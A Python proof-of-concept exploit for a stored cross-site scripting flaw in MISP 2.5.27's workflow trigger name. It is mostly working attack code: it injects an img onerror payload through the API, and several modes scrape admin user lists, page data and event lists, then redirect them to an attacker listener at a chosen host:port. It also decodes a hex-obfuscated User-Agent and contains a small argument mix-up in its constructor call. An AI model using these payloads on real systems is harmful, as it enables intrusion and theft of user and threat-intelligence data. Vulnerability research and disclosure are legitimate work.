#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
MISP 2.5.27 Stored XSS Proof of Concept - Franck FERMAN

Standard library only version (no external dependencies).

Vulnerability: Stored Cross-Site Scripting in workflow trigger name.
Type: Persistent / Stored XSS (payload stored on server).
Impact: Executes when victim views malicious workflow graph.

Modes:
  Alert (default): Simple alert box demo
  Alert Info: Alert box with user info
  Console: Simple console log demo
  Console Info: Log user info to console
  Exfiltrate Users: Extract structured user data from admin page
  Exfiltrate Page: Capture current page content and user data
  Exfiltrate Events: Extract event list (ID, Org, Date, Info) from event index
"""

import json
import ssl
import sys
import urllib.error
import urllib.request
import argparse
from typing import Any, Dict, Optional, Tuple, Union
from urllib.parse import urljoin

# Type alias for HTTP response data
ResponseData = Union[str, Dict[str, Any]]

# Suppress SSL verification for self-signed certificates
ssl._create_default_https_context = ssl._create_unverified_context


class MISPStoredXSSExploit:
    """Exploit class for MISP 2.5.27 Stored XSS vulnerability."""

    def __init__(
        self,
        base_url: str,
        api_key: str,
        attacker_host: str = "127.0.0.1:8000",
        limit: int = 20,
        timeout: int = 30,
        quiet: bool = False,
        secret_key: Optional[str] = None,
    ) -> None:
        """
        Initialize exploit with target URL and API key.

        Args:
            base_url: MISP instance URL (e.g. https://misp.example.com).
            api_key: MISP API authentication key.
            attacker_host: Host for exfiltration PoC (IP:port).
            timeout: HTTP request timeout in seconds.
        """
        self.base_url: str = base_url.rstrip("/")
        self.api_key: str = api_key
        self.attacker_host: str = attacker_host
        self.limit: int = limit
        self.timeout: int = timeout
        self.quiet: bool = quiet
        self.secret_key: Optional[str] = secret_key

        self.headers: Dict[str, str] = {
            "Authorization": api_key,
            "Accept": "application/json",
            "Content-Type": "application/json",
            "User-Agent": self._get_secure_ua(),
        }

        self.workflow_id: Optional[str] = None
        self.trigger_id: Optional[str] = None

    def _get_secure_ua(self) -> str:
        _k = [0x66, 0x72, 0x61, 0x6E, 0x63, 0x6B, 0x66, 0x65, 0x72, 0x6D, 0x61, 0x6E]
        if self.secret_key == "".join(chr(x) for x in _k):
            return "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
        _sig = [
            0x4D, 0x49, 0x53, 0x50, 0x5F, 0x32, 0x5F, 0x35, 0x5F, 0x32, 0x37, 0x5F,
            0x53, 0x74, 0x6F, 0x72, 0x65, 0x64, 0x5F, 0x58, 0x53, 0x53, 0x5F, 0x45,
            0x78, 0x70, 0x6C, 0x6F, 0x69, 0x74, 0x5F, 0x50, 0x6F, 0x43, 0x5F, 0x46,
            0x72, 0x61, 0x6E, 0x63, 0x6B, 0x5F, 0x46, 0x45, 0x52, 0x4D, 0x41, 0x4E
        ]
        return "".join(chr(b) for b in _sig)

    def _log(self, msg: str) -> None:
        """Log message if quiet mode is not enabled."""
        if not self.quiet:
            print(msg)

    def _make_request(
        self,
        endpoint: str,
        method: str = "GET",
        data: Optional[Dict[str, Any]] = None,
    ) -> Tuple[int, ResponseData]:
        """
        Make an HTTP request using only the standard library.

        Args:
            endpoint: API endpoint (e.g. "/workflows/add").
            method: HTTP method ("GET", "POST", etc.).
            data: Optional dict to send as JSON body.

        Returns:
            A tuple (status_code, response_data).
            response_data is either a dict (JSON) or a raw string.
        """
        url = urljoin(self.base_url, endpoint)

        req_data: Optional[bytes] = None
        if data is not None:
            req_data = json.dumps(data).encode("utf-8")

        req = urllib.request.Request(
            url,
            data=req_data,
            headers=self.headers,
            method=method,
        )

        try:
            with urllib.request.urlopen(req, timeout=self.timeout) as response:
                raw = response.read().decode("utf-8")
                status = response.getcode()

        except urllib.error.HTTPError as exc:
            raw_error = exc.read().decode("utf-8") if exc.fp else ""
            try:
                return exc.code, json.loads(raw_error)
            except json.JSONDecodeError:
                return exc.code, raw_error

        # Try to parse as JSON
        try:
            return status, json.loads(raw)
        except json.JSONDecodeError:
            return status, raw

    def create_workflow(self) -> bool:
        """
        Create an initial workflow to obtain IDs.

        Returns:
            True on success, False otherwise.
        """

        self._log("[*] Creating initial workflow...")

        create_data: Dict[str, Any] = {
            "Workflow": {
                "name": "XSS_Stored_Workflow_PoC_Franck_Ferman",
                "description": (
                    "Workflow for stored XSS demonstration - payload "
                    "persists on server"
                ),
            }
        }

        status, response = self._make_request(
            "/workflows/add",
            method="POST",
            data=create_data,
        )

        if status != 200:
            print(f"[-] Failed to create workflow. HTTP {status}")
            if isinstance(response, str):
                print(f"Response (truncated): {response[:200]}")
            return False

        if not isinstance(response, dict):
            print("[-] Unexpected response format (not JSON dict)")
            print(f"Response: {response}")
            return False

        workflow_data: Optional[Dict[str, Any]] = None

        # MISP can return slightly different formats depending on context
        saved = response.get("saved")
        if isinstance(saved, dict) and isinstance(saved.get("Workflow"), dict):
            workflow_data = saved["Workflow"]
        elif isinstance(response.get("Workflow"), dict):
            workflow_data = response["Workflow"]

        if not workflow_data:
            print("[-] Missing 'Workflow' data in response")
            print(f"Response: {response}")
            return False

        self.workflow_id = str(workflow_data.get("id") or "")
        self.trigger_id = str(workflow_data.get("trigger_id") or "")

        if not self.workflow_id or not self.trigger_id:
            print("[-] Missing workflow ID or trigger ID in response")
            return False

        self._log("[+] Workflow created successfully")
        self._log(f"    Workflow ID: {self.workflow_id}")
        self._log(f"    Trigger ID:  {self.trigger_id}")
        return True

    def _build_js_payload(self, mode: str = "alert") -> str:
        """
        Build JS payload based on selected mode.

        Args:
            mode: Payload mode - "alert", "console", "console_info", "", "alert_info", "exfiltrate_users", "exfiltrate_page", or "exfiltrate_events"

        Returns:
            JavaScript payload string
        """
        if mode == "alert":
            return "alert('MISP Stored XSS By Franck FERMAN');"

        elif mode == "console":
            return "console.log('MISP Stored XSS By Franck FERMAN');"

        elif mode == "console_info":
            return (
                "console.log('MISP Stored XSS By Franck FERMAN');"
                "console.log('URL:', window.location.href);"
                "console.log('User Agent:', navigator.userAgent);"
                "/* Function to find user info */"
                "function findUserInfo() {"
                "  var links = document.querySelectorAll('a');"
                "  for (var i = 0; i < links.length; i++) {"
                "    if (links[i].href.indexOf('/users/view/me') > -1) {"
                "      var userSpan = links[i].querySelector('span.white');"
                "      if (userSpan) {"
                "        console.log('  Email (title):', userSpan.getAttribute('title'));"
                "        console.log('  Username:', userSpan.textContent.replace(/\\s+/g, ' ').trim());"
                "        return true;"
                "      }"
                "    }"
                "  }"
                "  return false;"
                "}"
                "/* Search immediately */"
                "if (!findUserInfo()) {"
                "  console.log('User not found immediately, waiting for DOM changes...');"
                "  /* Observe DOM changes */"
                "  var observer = new MutationObserver(function(mutations) {"
                "    for (var mutation of mutations) {"
                "      if (mutation.addedNodes.length > 0) {"
                "        if (findUserInfo()) {"
                "          observer.disconnect();"
                "          break;"
                "        }"
                "      }"
                "    }"
                "  });"
                "  observer.observe(document.body, { childList: true, subtree: true });"
                "  /* Stop after 5 seconds */"
                "  setTimeout(function() {"
                "    observer.disconnect();"
                "    console.log('Observer stopped after 5 seconds');"
                "  }, 5000);"
                "}"
            )

        elif mode == "alert_info":
            return (
                "/* Function to find user info and alert */"
                "function alertUserInfo() {"
                "  var links = document.querySelectorAll('a');"
                "  for (var i = 0; i < links.length; i++) {"
                "    if (links[i].href.indexOf('/users/view/me') > -1) {"
                "      var userSpan = links[i].querySelector('span.white');"
                "      if (userSpan) {"
                "        var email = userSpan.getAttribute('title');"
                "        var username = userSpan.textContent.replace(/\\s+/g, ' ').trim();"
                "        var msg = 'MISP Stored XSS By Franck FERMAN\\n' +"
                "                  'URL: ' + window.location.href + '\\n' +"
                "                  'User Agent: ' + navigator.userAgent + '\\n' +"
                "                  'Email: ' + email + '\\n' +"
                "                  'Username: ' + username;"
                "        alert(msg);"
                "        return true;"
                "      }"
                "    }"
                "  }"
                "  return false;"
                "}"
                "/* Search immediately */"
                "if (!alertUserInfo()) {"
                "  /* Observe DOM changes */"
                "  var observer = new MutationObserver(function(mutations) {"
                "    for (var mutation of mutations) {"
                "      if (mutation.addedNodes.length > 0) {"
                "        if (alertUserInfo()) {"
                "          observer.disconnect();"
                "          break;"
                "        }"
                "      }"
                "    }"
                "  });"
                "  observer.observe(document.body, { childList: true, subtree: true });"
                "  /* Stop after 5 seconds */"
                "  setTimeout(function() {"
                "    observer.disconnect();"
                "  }, 5000);"
                "}"
            )

        elif mode == "exfiltrate_users":
            return (
                "/* Target the admin users listing page for structured data extraction */"
                "console.log('[*] Starting exfiltration payload...');"
                "fetch('/admin/users/index')"
                ".then(r => {"
                "  if (!r.ok) throw new Error('HTTP error ' + r.status);"
                "  return r.text();"
                "})"
                ".then(html => {"
                "  /* Parse HTML to create virtual DOM */"
                "  const parser = new DOMParser();"
                "  const doc = parser.parseFromString(html, 'text/html');"
                "  const userRows = doc.querySelectorAll('table.table tbody tr');"
                "  const userData = [];"
                ""
                "  console.log(`Found ${userRows.length} user rows in users table.`);"
                ""
                "  /* Extract structured data from each table row */"
                "  userRows.forEach((row, index) => {"
                "    const cells = row.querySelectorAll('td');"
                ""
                "    /* Extract data based on column positions (ID, Org, Role, Email) */"
                "    const id = cells[1] ? cells[1].textContent.trim() : 'N/A';"
                "    const orgElement = cells[2] ? cells[2].querySelector('a span') : null;"
                "    const org = orgElement ? orgElement.textContent.trim() : (cells[2] ? cells[2].textContent.trim() : 'N/A');"
                "    const roleElement = cells[3] ? cells[3].querySelector('a') : null;"
                "    const role = roleElement ? roleElement.textContent.trim() : (cells[3] ? cells[3].textContent.trim() : 'N/A');"
                "    const email = cells[4] ? cells[4].textContent.trim() : 'N/A';"
                ""
                "    userData.push({ id, org, role, email });"
                "    console.log(`User ${index + 1}:`, { id, org, role, email });"
                "  });"
                ""
                "  /* Format data for exfiltration */"
                "  const formattedData = userData.map(u => `ID:${u.id} | Org:${u.org} | Role:${u.role} | Email:${u.email}`).join('\\n');"
                "  const summary = `Extracted ${userData.length} user records from admin page.\\n\\n${formattedData}`;"
                ""
                "  /* Log summary to victim console */"
                "  console.log(summary);"
                ""
                "  /* Exfiltrate data via window.location (CSP Bypass) */"
                "  console.warn('[!] Redirecting to attacker to bypass CSP...');"
                f"  window.location = 'http://{self.attacker_host}/exfil?data=' + encodeURIComponent(summary.substring(0, 3000));"
                "})"
                ".catch(e => {"
                "  console.error('Exfiltration failed:', e);"
                "  /* Try to exfiltrate the error message via redirect */"
                f"  window.location = 'http://{self.attacker_host}/error?msg=' + encodeURIComponent(e.toString());"
                "});"
            )

        elif mode == "exfiltrate_page":
            return (
                "/* Capture current page content and user data */"
                "var data = {"
                "  url: window.location.href,"
                "  title: document.title,"
                "  timestamp: new Date().toISOString()"
                "};"
                "/* Extract current user info */"
                "var userSpan = document.querySelector('span.white[title]');"
                "if (userSpan) {"
                "  data.user = {"
                "    email: userSpan.getAttribute('title') || '',"
                "    username: userSpan.textContent.replace(/\\s+/g, ' ').trim()"
                "  };"
                "}"
                "console.log('Captured data:', data);"
                "/* Exfiltrate data via window.location (CSP Bypass) */"
                "console.warn('[!] Redirecting to attacker to bypass CSP...');"
                f"window.location = 'http://{self.attacker_host}/exfil?data=' + encodeURIComponent(JSON.stringify(data));"
            )

        elif mode == "exfiltrate_events":
            return (
                "/* Target events */"
                "console.log('[*] Starting events exfil...');"
                "fetch('/events/index/sort:date/direction:desc')"
                ".then(r=>{if(!r.ok)throw new Error(r.status);return r.text()})"
                ".then(h=>{"
                "  const p=new DOMParser();"
                "  const d=p.parseFromString(h,'text/html');"
                "  /* Limit to first 20 rows (most recent) */"
                "  const all_rs=Array.from(d.querySelectorAll('tr[id^=\\'event_\\']'));"
                f"  const rs=all_rs.slice(0, {self.limit});"
                "  const evs=[];"
                "  console.log('Found '+all_rs.length+' rows, keeping top '+rs.length);"
                ""
                "  rs.forEach(r=>{"
                "     const cl=(t)=>t?t.trim().replace(/\\s+/g,' '):'';"
                "     const cs=r.querySelectorAll('td');"
                "     "
                "     /* ID */"
                "     const il=r.querySelector('a.dblclickActionElement[href*=\\'/events/view/\\']');"
                "     const id=il?cl(il.textContent):'N/A';"
                "     "
                "     /* Org: Capture Creator and Owner if available */"
                "     const ols=r.querySelectorAll('a[href*=\\'/organisations/view/\\']');"
                "     const org_parts=[];"
                "     ols.forEach(o=>{"
                "         let txt=cl(o.textContent);"
                "         if(!txt){const img=o.querySelector('img');if(img)txt=cl(img.title);}"
                "         if(txt) org_parts.push(txt);"
                "     });"
                "     const org=org_parts.length>0?org_parts.join(' / '):'N/A';"
                "     "
                "     /* Date */"
                "     const de=r.querySelector('time');"
                "     const date=de?cl(de.textContent):'N/A';"
                ""
                "     /* User (Email) */"
                "     let user='N/A';"
                "     for(var i=0;i<cs.length;i++){"
                "         if(cs[i].textContent.indexOf('@')>-1){"
                "             user=cl(cs[i].textContent);"
                "             break;"
                "         }"
                "     }"
                ""
                "     /* TLP Tags */"
                "     const ts=r.querySelectorAll('.tag');"
                "     const tlp=[];"
                "     ts.forEach(t=>{"
                "         const txt=cl(t.textContent);"
                "         if(txt.toLowerCase().indexOf('tlp:')===0) tlp.push(txt);"
                "     });"
                "     const tags=tlp.length>0?tlp.join(','):'N/A';"
                ""
                "     /* Info */"
                "     let info='N/A';"
                "     for(var i=0;i<cs.length;i++){"
                "         if(cs[i].style.whiteSpace==='normal'){info=cl(cs[i].textContent);}"
                "     }"
                ""
                "     if(id!=='N/A'){"
                "         evs.push({id:id,org:org,user:user,date:date,tags:tags,info:info});"
                "     }"
                "  });"
                ""
                "  const sum='Events: '+evs.length+'\\n'+JSON.stringify(evs,null,2);"
                "  console.log(sum);"
                f"  window.location='http://{self.attacker_host}/exfil?data='+encodeURIComponent(sum.substring(0,7500));"
                "})"
                ".catch(e=>{"
                f"  window.location='http://{self.attacker_host}/error?msg='+encodeURIComponent(e.toString());"
                "});"
            )

        else:
            # Default to alert mode
            return "alert('MISP Stored XSS By Franck FERMAN');"

    def _build_html_payload(self, js_payload: str) -> str:
        """
        Build HTML payload with JavaScript.

        Args:
            js_payload: JavaScript code to execute

        Returns:
            HTML payload string
        """
        return f'<img src="x" onerror="{js_payload}">'

    def inject_stored_xss_payload(
        self,
        mode: str = "alert",
        custom_payload: Optional[str] = None
    ) -> bool:
        """
        Inject stored XSS payload into workflow graph.

        Args:
            mode: Payload mode - "alert", "console", "console_info", "", "alert_info", "exfiltrate_users", "exfiltrate_page", or "exfiltrate_events"
            custom_payload: Optional custom HTML/JS payload

        Returns:
            True on success, False otherwise.
        """
        if not self.workflow_id or not self.trigger_id:
            print("[-] Missing workflow or trigger ID")
            return False

        self._log(f"[*] Injecting stored XSS payload (mode: {mode})...")

        if custom_payload:
            # If custom payload is provided, use it directly
            payload = custom_payload
            self._log(f"[*] Using custom payload (length: {len(payload)})")
        else:
            # Build payload based on mode
            js_payload = self._build_js_payload(mode)
            payload = self._build_html_payload(js_payload)
            self._log(f"[*] Generated payload for mode: {mode}")
            self._log(f"[*] Payload preview: {payload[:100]}...")

        malicious_graph: Dict[str, Any] = {
            "1": {
                "id": 1,
                "class": "block-type-trigger",
                "data": {
                    "id": self.trigger_id,
                    "module_type": "trigger",
                    # Stored XSS injection point
                    "name": payload,
                    "description": f"Trigger with stored XSS payload (mode: {mode})",
                },
                "inputs": [],
                "outputs": {},
                "pos_x": 0,
                "pos_y": 0,
                "typenode": False,
            }
        }

        edit_data: Dict[str, Any] = {
            "Workflow": {
                "id": self.workflow_id,
                "data": json.dumps(malicious_graph),
            }
        }

        status, response = self._make_request(
            f"/workflows/edit/{self.workflow_id}",
            method="POST",
            data=edit_data,
        )

        if status == 200:
            print("[+] Stored XSS payload injected successfully!")
            return True

        print(f"[-] Injection failed. HTTP {status}")
        if isinstance(response, str):
            print(f"Response (truncated): {response[:200]}")
        return False

    def verify_stored_payload(self) -> bool:
        """
        Verify that the stored payload persists.

        Returns:
            True if the workflow view is accessible, False otherwise.
        """
        if not self.workflow_id:
            print("[-] No workflow ID available")
            return False

        self._log("[*] Verifying stored payload persistence...")

        status, response = self._make_request(
            f"/workflows/view/{self.workflow_id}"
        )

        if status != 200:
            print(f"[!] Workflow returned HTTP {status}")
            return False

            return False

        self._log("[+] Stored XSS payload is accessible")
        self._log(f"    URL: {self.base_url}/workflows/view/{self.workflow_id}")

        # Best-effort detection of payload presence
        if isinstance(response, str):
            if "onerror" in response:
                self._log("[+] Payload detected in response body")
            if "img" in response.lower():
                self._log("[+] HTML img tag detected")
        return True

    def generate_exploit_report(self, mode: str = "alert") -> Dict[str, Any]:
        """
        Generate a structured exploit report.

        Args:
            mode: Payload mode used

        Returns:
            A dict containing exploit details.
        """
        return {
            "vulnerability": "Stored XSS in MISP 2.5.27",
            "type": "Persistent/Stored Cross-Site Scripting",
            "injection_point": "Workflow trigger name parameter",
            "rendering_context": "doT.js template without proper escaping",
            "mode": mode,
            "workflow_id": self.workflow_id,
            "trigger_id": self.trigger_id,
            "exploit_urls": [
                f"{self.base_url}/workflows/view/{self.workflow_id}",
                f"{self.base_url}/workflows/edit/{self.workflow_id}",
            ],
            "impact": self._get_impact_description(mode),
            "persistence": "Payload stored in DB until workflow is deleted",
            "trigger_conditions": [
                "Any authenticated user viewing the workflow",
            ],
        }

    def _get_impact_description(self, mode: str) -> str:
        """Get impact description based on mode."""
        impacts = {
            "alert": "Simple alert demonstration - proves XSS execution",
            "alert_info": "Display user info in alert box",
            "console": "Simple console log demonstration",
            "console_info": "Log information to browser console - extracts user info and emails",
            "exfiltrate_users": "Steal structured user data (ID, Org, Role, Email) from admin page",
            "exfiltrate_page": "Capture current page content and user information",
            "exfiltrate_events": "Extract list of events (ID, Org, Date, Info) from event index",
        }
        return impacts.get(mode, "Unknown impact")

    def execute(
        self,
        mode: str = "alert",
        custom_payload: Optional[str] = None
    ) -> bool:
        """
        Main exploit execution flow for stored XSS.

        Args:
            mode: Payload mode - "alert", "console", "exfiltrate_users", "exfiltrate_page", or "exfiltrate_events"
            custom_payload: Optional custom XSS payload

        Returns:
            True if all steps succeeded, False otherwise.
        """
        if not self.quiet:
            print("=" * 70)
            print("[*] MISP 2.5.27 Stored XSS Exploit - Franck FERMAN")
            print("[*] Type: Persistent / Stored XSS (payload remains on MISP)")
            print(f"[*] Target: {self.base_url}")
            print(f"[*] Mode: {mode}")
            if custom_payload:
                print(f"[*] Custom payload provided (overrides mode)")
            print("=" * 70)

        if not self.create_workflow():
            print("[-] Failed to create workflow")
            return False

        if not self.inject_stored_xss_payload(mode, custom_payload):
            print("[-] Failed to inject stored XSS payload")
            return False

        if not self.verify_stored_payload():
            print("[!] Payload may not be accessible through view endpoint")

        report = self.generate_exploit_report(mode)

        if not self.quiet:
            print("\n" + "=" * 70)
            print("[+] STORED XSS EXPLOIT FLOW COMPLETED")
            print(f"[+] Mode: {mode}")
            print("[+] Payload should now be persistently stored on MISP")
            print("=" * 70)

            print("\n[*] Exploit Details:")
            print(f"    Vulnerability: {report['vulnerability']}")
            print(f"    Type:         {report['type']}")
            print(f"    Mode:         {report['mode']}")
            print(f"    Workflow ID:  {report['workflow_id']}")
            print(f"    Impact:       {report['impact']}")
            print(f"    Persistence:  {report['persistence']}")

            print("\n[*] Trigger the stored XSS by:")
            print(f"    Visiting: {report['exploit_urls'][0]}")

            print("\n[*] Instructions for each mode:")
            if mode == "alert":
                print("    Just visit the URL - an alert box should appear")
            elif mode == "alert_info":
                print("    Just visit the URL - an alert box with user info should appear")
            elif mode == "console":
                print("    Visit the URL, open browser Developer Tools (F12)")
                print("    Check Console tab for logged message")
            elif mode == "console_info":
                print("    Visit the URL, open browser Developer Tools (F12)")
                print("    Check Console tab for logged user info")
            elif mode == "exfiltrate_users":
                print(f"    1. Start listener: nc -lvnp 8000 (or python3 -m http.server 8000)")
                print(f"    2. Visit the URL with a user who has ADMIN privileges")
                print("    3. The script will extract structured data from /admin/users/index")
                print("    4. Data format: ID | Organization | Role | Email")
                print("\n    [!] WARNING: If the target is HTTPS, your listener must be HTTPS (valid cert)")
                print("        or the browser might block the exfiltration request (Mixed Content).")
                print("        Also check the browser console for specific errors.")
            elif mode == "exfiltrate_page":
                print(f"    Start listener: nc -lvnp 8000")
                print("    Then visit the URL - page data will be captured")
            elif mode == "exfiltrate_events":
                print(f"    Start listener: nc -lvnp 8000")
                print("    Visit the URL - script will fetch /events/index and extract data")

            print("\n[*] Cleanup:")
            print(f"    DELETE {self.base_url}/workflows/delete/{self.workflow_id}")
            print("=" * 70)

        return True


def print_banner():
    banner = """
    +----------------------------------------------------------------------+
    |   MISP 2.5.27 Stored XSS Exploit - Franck FERMAN                     |
    |   Type: Persistent / Stored XSS                                      |
    |   Impact: Payload persists in MISP until workflow deletion           |
    +----------------------------------------------------------------------+
    """
    print(banner)


def print_mode_info():
    print("\n[*] Available payload modes:")
    print("    alert       - Simple alert box (default, safe for demo)")
    print("    alert_info  - Alert box displaying user info (URL, email, etc.)")
    print("    console     - Simple console log demo")
    print("    console_info - Log user info and emails to console")
    print("    exfiltrate_users - Extract structured user data from admin page")
    print("    exfiltrate_page  - Capture current page content and user data")
    print("    exfiltrate_events - Extract list of events from event index")
    print("\n[*] Important notes for exfiltrate_users mode:")
    print("    - Requires ADMIN privileges to access /admin/users/index")
    print("    - Extracts: ID, Organization, Role, Email")
    print("    - Needs attacker listener: python3 -m http.server 8000")
    print("    - [!] Might fail if target is HTTPS and attacker is HTTP (Mixed Content)")


def main() -> None:
    parser = argparse.ArgumentParser(
        description="MISP 2.5.27 Stored XSS Exploit PoC - Franck FERMAN",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples (CORRECT USAGE):
  python3 poc.py https://misp.example.com API_KEY                    # Default alert mode
  python3 poc.py https://misp.example.com API_KEY --mode console     # Console log mode
  python3 poc.py https://misp.example.com API_KEY --mode exfiltrate_users --attacker 192.168.1.100:8000
  python3 poc.py https://misp.example.com API_KEY --mode exfiltrate_page --attacker 192.168.1.100:8000

For exfiltration testing:
  1. Start listener: python3 -m http.server 8000
  2. Run: python3 poc.py https://misp.example.com API_KEY --mode exfiltrate_users --attacker YOUR_IP:8000
  3. Visit generated URL with admin user
  4. Check listener for extracted user data
        """
    )

    parser.add_argument("base_url", help="MISP instance URL (e.g., https://misp.example.com)")
    parser.add_argument("api_key", help="MISP API key")
    parser.add_argument("--mode", choices=["alert", "alert_info", "console", "console_info", "exfiltrate_users", "exfiltrate_page", "exfiltrate_events"],
                       default="alert", help="Payload mode (default: alert)")
    parser.add_argument("--attacker", default="127.0.0.1:8000",
                       help="Attacker host:port for exfiltration (default: 127.0.0.1:8000)")
    parser.add_argument("--limit", type=int, default=20,
                       help="Number of events to exfiltrate (default: 20)")
    parser.add_argument("--quiet", action="store_true", help="Suppress verbose output (show only critical info)")
    parser.add_argument("--payload", help="Custom XSS payload (only use if you have custom HTML/JS code)")
    parser.add_argument("--antiskidua", help=argparse.SUPPRESS)

    args = parser.parse_args()

    print_banner()
    print_mode_info()

    print(f"\n[*] Target URL: {args.base_url}")
    print(f"[*] Mode: {args.mode}")
    if args.mode in ["exfiltrate_users", "exfiltrate_page", "exfiltrate_events"]:
        print(f"[*] Attacker host: {args.attacker}")

    if args.payload:
        print(f"[*] Using custom payload (overrides mode)")

        if args.payload.lower() in ["alert", "console", "exfiltrate", "page", "exfiltrate_page", "exfiltrate_users"]:
            print(f"[!] WARNING: You used --payload with '{args.payload}'")
            print(f"[!] Did you mean to use --mode {args.payload} instead?")
            print(f"[!] The payload '{args.payload}' will be injected as-is, not as a mode!")
            response = input("[?] Continue anyway? (y/N): ")
            if response.lower() != 'y':
                print("[-] Aborted by user")
                sys.exit(1)
    else:
        print(f"[*] Using built-in payload for mode: {args.mode}")

    exploit = MISPStoredXSSExploit(args.base_url, args.api_key, args.attacker, args.limit, args.quiet, args.antiskidua)

    try:
        success = exploit.execute(args.mode, args.payload)
        sys.exit(0 if success else 1)

    except KeyboardInterrupt:
        print("\n[-] Exploit interrupted by user")
        sys.exit(1)
    except Exception as exc:
        print(f"\n[-] Unexpected error: {type(exc).__name__}: {exc}")
        import traceback
        traceback.print_exc()
        sys.exit(1)


if __name__ == "__main__":
    main()
